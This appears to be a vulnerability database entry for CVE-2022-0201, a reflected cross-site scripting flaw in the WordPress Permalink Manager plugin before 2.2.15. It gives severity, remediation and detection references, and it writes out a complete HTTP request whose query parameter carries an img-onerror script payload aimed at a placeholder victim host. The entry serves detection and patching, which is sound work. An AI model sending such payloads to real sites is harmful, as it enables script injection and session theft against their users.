🔙 목록으로 돌아가기

CVE-2022-0201: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting

TitleWordPress Permalink Manager <2.2.15 - Cross-Site Scripting
AuthorAkincibor
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
RemediationUpdate to WordPress Permalink Manager version 2.2.15 or later to mitigate the vulnerability.
CVSS Score6.1
EPSS Score0.20086
CVE IDCVE-2022-0201
CWE IDCWE-79
Tags cve cve2022 wp-plugin wpscan xss wordpress permalink_manager_lite_project vuln

🔍 Vulnerability Description

WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.

🌐 HTTP Request

GET /index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0201.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-0201.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A